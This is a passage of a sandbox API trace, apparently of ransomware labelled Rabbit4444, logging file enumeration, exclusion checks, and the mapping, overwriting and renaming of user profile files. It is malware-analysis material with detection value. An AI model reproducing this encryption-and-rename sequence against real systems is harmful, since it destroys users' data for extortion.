RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0060.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0060.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0060.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0060.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0060.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0060.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127470 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1279a0 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127788 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127bb0 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103cc8 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0060.394] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15170501120) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0060.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0060.394] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.395] CloseHandle (hObject=0x29c) returned 1 [0060.395] CloseHandle (hObject=0x260) returned 1 [0060.395] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG1.Rabbit4444") returned 43 [0060.395] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0060.396] InterlockedExchangeAdd (in: Addend=0xff820, Value=32768 | out: Addend=0xff820) returned 0 [0060.396] InterlockedExchangeAdd (in: Addend=0xff82c, Value=15 | out: Addend=0xff82c) returned 0 [0060.396] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Rabbit4444.exe") returned -1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="windows") returned -1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="bootmgr") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="pagefile.sys") returned -1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="boot") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ids.txt") returned 1 [0060.396] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="NTUSER.DAT") returned 1 [0060.396] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0060.396] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2", dwFileAttributes=0x22) returned 1 [0060.397] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2", dwFileAttributes=0x6) returned 1 [0060.397] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0060.397] lstrlenW (lpString="Rabbit4444") returned 10 [0060.397] lstrcmpiW (lpString1="R.DAT.LOG2", lpString2="Rabbit4444") returned -1 [0060.397] lstrlenW (lpString=".dll") returned 4 [0060.397] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0060.397] lstrlenW (lpString=".lnk") returned 4 [0060.397] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0060.397] lstrlenW (lpString=".ini") returned 4 [0060.397] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0060.397] lstrlenW (lpString=".sys") returned 4 [0060.397] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0060.397] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.397] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.397] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15170794788) returned 1 [0060.397] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=20480) returned 1 [0060.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0060.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0060.397] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5300, lpName=0x0) returned 0x2a0 [0060.400] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5300) returned 0x70000 [0060.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0060.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0060.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0060.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0060.407] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15171773101) returned 1 [0060.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0060.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0060.407] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.407] CloseHandle (hObject=0x2a0) returned 1 [0060.407] CloseHandle (hObject=0x260) returned 1 [0060.407] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG2.Rabbit4444") returned 43 [0060.408] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat.log2.rabbit4444"), dwFlags=0x1) returned 1 [0060.408] InterlockedExchangeAdd (in: Addend=0xff820, Value=20480 | out: Addend=0xff820) returned 32768 [0060.408] InterlockedExchangeAdd (in: Addend=0xff82c, Value=9 | out: Addend=0xff82c) returned 15 [0060.408] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7dab84ff, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855f639a, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="Rabbit4444.exe") returned -1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2=".") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="..") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="windows") returned -1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="bootmgr") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="pagefile.sys") returned -1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="boot") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="ids.txt") returned 1 [0060.408] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", lpString2="NTUSER.DAT") returned 1 [0060.409] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf" | out: lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf") returned="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf" [0060.409] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", dwFileAttributes=0x22) returned 1 [0060.409] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", dwFileAttributes=0x6) returned 1 [0060.409] lstrlenW (lpString="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf") returned 55 [0060.409] lstrlenW (lpString="Rabbit4444") returned 10 [0060.409] lstrcmpiW (lpString1="20}.TM.blf", lpString2="Rabbit4444") returned -1 [0060.409] lstrlenW (lpString=".dll") returned 4 [0060.409] lstrcmpiW (lpString1=".blf", lpString2=".dll") returned -1 [0060.409] lstrlenW (lpString=".lnk") returned 4 [0060.409] lstrcmpiW (lpString1=".blf", lpString2=".lnk") returned -1 [0060.409] lstrlenW (lpString=".ini") returned 4 [0060.409] lstrcmpiW (lpString1=".blf", lpString2=".ini") returned -1 [0060.409] lstrlenW (lpString=".sys") returned 4 [0060.409] lstrcmpiW (lpString1=".blf", lpString2=".sys") returned -1 [0060.409] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.410] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.410] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15172031592) returned 1 [0060.410] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=65536) returned 1 [0060.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0060.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0060.410] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x2a0 [0060.411] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x70000 [0060.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0060.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0060.415] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15172550983) returned 1 [0060.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0060.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0060.415] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.416] CloseHandle (hObject=0x2a0) returned 1 [0060.416] CloseHandle (hObject=0x260) returned 1 [0060.416] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.Rabbit4444") returned 83 [0060.416] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf.rabbit4444"), dwFlags=0x1) returned 1 [0060.416] InterlockedExchangeAdd (in: Addend=0xff820, Value=65536 | out: Addend=0xff820) returned 53248 [0060.416] InterlockedExchangeAdd (in: Addend=0xff82c, Value=5 | out: Addend=0xff82c) returned 24 [0060.416] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ddd9675, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="Rabbit4444.exe") returned -1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0060.416] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootmgr") returned 1 [0060.417] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="pagefile.sys") returned -1 [0060.417] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot") returned 1 [0060.417] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="ids.txt") returned 1 [0060.417] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0060.417] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms" [0060.417] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x22) returned 1 [0060.417] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x6) returned 1 [0060.418] lstrlenW (lpString="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0060.418] lstrlenW (lpString="Rabbit4444") returned 10 [0060.418] lstrcmpiW (lpString1="egtrans-ms", lpString2="Rabbit4444") returned -1 [0060.418] lstrlenW (lpString=".dll") returned 4 [0060.418] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0060.418] lstrlenW (lpString=".lnk") returned 4 [0060.418] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0060.418] lstrlenW (lpString=".ini") returned 4 [0060.418] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0060.418] lstrlenW (lpString=".sys") returned 4 [0060.418] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0060.418] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.418] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.418] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15172897839) returned 1 [0060.418] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=524288) returned 1 [0060.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0060.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0060.418] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x2a0 [0060.420] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, 